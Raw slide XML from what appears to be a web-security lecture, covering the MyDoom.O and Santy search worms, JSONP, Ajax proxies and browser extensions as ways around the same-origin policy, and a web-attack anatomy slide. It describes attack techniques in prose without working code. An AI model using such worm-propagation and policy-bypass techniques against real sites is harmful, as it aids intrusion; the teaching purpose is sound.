              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>MyDoom.O uses the domain names of email addresses to search for more email addresses on Internet search engines. It first started spreading on July 26th, 2004 and managed to infect about 60,000 hosts in less than 8 hours. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>MyDoom.O used the following search engines, weighted by their respective probabilities: Google (45%), Lycos (22.5%), Yahoo (20%) and Altavista (12.5%).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Santy (Dec 2004)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>It was the first search worm to propagate automatically, without any human intervention. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>It is written in Perl and exploits a bug in the phpBB bulletin system that allows an adversary to run arbitrary code on the web server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>To find vulnerable servers to infect, it uses Google to search for URLs that contain the string viewtopic.php. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>To infect a web server, Santy appends an exploit against phpBB2 to each URL extracted from the search results. The exploit instructs the web server to download the Santy worm from a central distribution site.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altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Bypassing the Same-Origin policy </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1300">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14131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57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8903A4-7A7F-44FD-9F12-9EADB41AFFC6}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75780" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Bookman Old Style" panose="02050604050505020204" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>JSON and the dynamic SCRIPT tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>JSON with Padding (JSONP) is a way to bypass the same-origin policy by using JSON in combination with the &lt;script&gt; tag. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>      &lt;script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>="http://travel.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>findItinerary?username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>sachiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>reservationNum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>=1234&amp;output=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>json&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>callback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>showItinerary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>When JavaScript code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>dynamically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>inserts the &lt;script&gt; tag, the browser accesses the URL in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> attribute. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>This results in sending the information in the query string to the server. In the above example, the username and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>reservationNum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> are passed as name-value pairs. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>In addition, the query string contains the output format requested to the server and the name of the callback function (that is, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>showItinerary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>In this case, the URL returns a JSONP string which is a JSON string wrapped by the callback function. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>When the &lt;script&gt; tag loads, the function executes, and the information returned from the server passes to it through its arguments.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>A better example is at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.west-wind.com/Weblog/posts/107136.aspx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3"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altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Bypassing Same-Origin Policy (cont..)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14234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68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E001380-0C64-4421-A738-218DC68B3D0C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76804" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Bookman Old Style" panose="02050604050505020204" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Ajax Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>An Ajax proxy is an application-level proxy server that mediates HTTP requests and responses between Web browsers and servers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Ajax proxies allow Web browsers to bypass the same-origin policy and therefore to access third-party servers using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Bookman Old Style" panose="02050604050505020204" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Browser Extensions and Plugins </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Browser extensions sometimes implement their own approaches to Web security, which often broadens the attack surface available to malicious sites either by enabling looser security policies and/or by allowing determined hackers to leverage loopholes or bugs within a particular extension. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>For example, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>GreaseMonkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> extension to Firefox adds an API called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>GM_XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>, which is basically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> without the same-origin policy.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="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cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Anatomy of a typical web attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1946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B35627D-2FD6-416F-8FC1-AC29CEDF7132}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30724" name="Picture 5" descr="C:\Documents and Settings\Arun Viswanathan\Local Settings\Temporary Internet Files\Content.IE5\A9L00MPR\MCj04352420000[1].png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="21211"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657600" y="2362200"/>
            <a:ext cx="139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3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7239000" y="2590800"/>
            <a:ext cx="1126913" cy="1152524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="228600">
              <a:schemeClr val="accent5">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Striped Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5257800" y="2971800"/>
            <a:ext cx="1371600" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="strip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0727" name="Picture 8" descr="C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\j019538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4572000"/>
            <a:ext cx="7715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Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="19812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1">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>www.foobar.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30729" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7086600" y="38862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ja-JP" altLang="en-US" sz="1200">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" b="1">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Joe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1200" b="1">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" b="1">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> The Hacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" b="1">
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30730" name="TextBox 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
